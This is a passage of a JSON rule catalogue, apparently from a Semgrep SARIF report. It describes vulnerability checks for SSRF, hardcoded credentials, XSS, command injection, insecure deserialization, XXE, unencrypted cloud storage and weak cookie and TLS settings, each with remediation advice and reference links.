scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"help":{"markdown":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password)\n - [https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password](https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password)\n","text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","id":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","name":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"help":{"markdown":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2)\n - [https://jinja.palletsprojects.com/en/2.11.x/api/#basics](https://jinja.palletsprojects.com/en/2.11.x/api/#basics)\n","text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"helpUri":"https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","id":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","name":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"help":{"markdown":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html)\n","text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","id":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","name":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"help":{"markdown":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","id":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","name":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.audit.jose-exposed-data.jose-exposed-data"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"help":{"markdown":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service)\n - [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io)\n","text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","id":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","name":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"help":{"markdown":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type)\n - [https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html](https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html)\n","text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","id":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","name":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"help":{"markdown":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","id":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","name":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/](https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django","id":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","name":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-joblib-django.tainted-joblib-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","id":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","name":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"help":{"markdown":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel)\n - [https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ](https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ)\n","text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","id":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","name":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","id":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","name":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"help":{"markdown":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 